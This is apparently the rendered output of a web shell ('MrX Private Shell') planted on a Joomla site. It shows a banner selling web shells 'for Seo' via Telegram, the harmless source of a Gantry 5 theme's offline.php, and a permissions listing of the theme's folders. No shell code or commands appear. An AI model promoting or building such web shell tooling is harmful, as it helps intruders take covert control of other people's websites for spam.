__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Gantry 5 Theme
* @author RocketTheme http://www.rockettheme.com
* @copyright Copyright (C) 2007 - 2022 RocketTheme, LLC
* @license GNU/GPLv2 and later
*
* http://www.gnu.org/licenses/gpl-2.0.html
*/
defined('_JEXEC') or die;
use Gantry\Framework\Platform;
use Gantry\Framework\Theme;
// Bootstrap Gantry framework or fail gracefully (inside included file).
$className = __DIR__ . '/custom/includes/gantry.php';
if (!is_file($className)) {
$className = __DIR__ . '/includes/gantry.php';
}
$gantry = include $className;
/** @var Platform $joomla */
$joomla = $gantry['platform'];
$joomla->document = $this;
/** @var Theme $theme */
$theme = $gantry['theme'];
ob_start();
include JPATH_THEMES . '/system/offline.php';
$html = ob_get_clean();
$start = strpos($html, '<body>') + 6;
$end = strpos($html, '</body>', $start);
$context = array(
'message' => substr($html, $start, $end - $start)
);
// Reset used outline configuration.
unset($gantry['configuration']);
// Render the page.
echo $theme
->setLayout('_offline', true)
->render('offline.html.twig', $context);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| admin | Folder | 0775 |
|
|
| blueprints | Folder | 0775 |
|
|
| config | Folder | 0775 |
|
|
| custom | Folder | 0775 |
|
|
| fields | Folder | 0775 |
|
|
| fonts | Folder | 0775 |
|
|
| gantry | Folder | 0775 |
|
|
| html | Folder | 0775 |
|
|
| images | Folder | 0775 |
|
|
| includes | Folder | 0775 |
|
|
| install | Folder | 0775 |
|
|
| js | Folder | 0775 |
|
|
| language | Folder | 0775 |
|
|
| layouts | Folder | 0775 |
|
|
| particles | Folder | 0775 |
|
|
| scss | Folder | 0775 |
|
|
| MD5SUMS | File | 18.1 KB | 0664 |
|
| component.php | File | 1004 B | 0664 |
|
| error.php | File | 1.23 KB | 0664 |
|
| index.php | File | 851 B | 0664 |
|
| install.php | File | 3.53 KB | 0664 |
|
| offline.php | File | 1.1 KB | 0664 |
|
| templateDetails.xml | File | 1.97 KB | 0664 |
|
| template_preview.png | File | 145.83 KB | 0664 |
|
| template_thumbnail.png | File | 17.77 KB | 0664 |
|